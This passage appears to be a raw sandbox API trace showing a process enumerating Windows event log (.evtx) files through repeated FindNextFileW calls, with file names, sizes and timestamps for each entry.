cAlternateFileName="HARDWA~1.EVT")) returned 1 [0286.396] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0286.396] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0286.396] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0286.397] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0286.397] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0286.398] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0286.399] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0286.399] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0286.399] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0286.399] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0286.399] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0286.400] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0286.400] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0286.400] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0286.400] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0286.401] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0286.402] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0286.403] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0286.404] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0286.404] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0286.404] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0286.404] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0286.405] FindNextFileW (in: 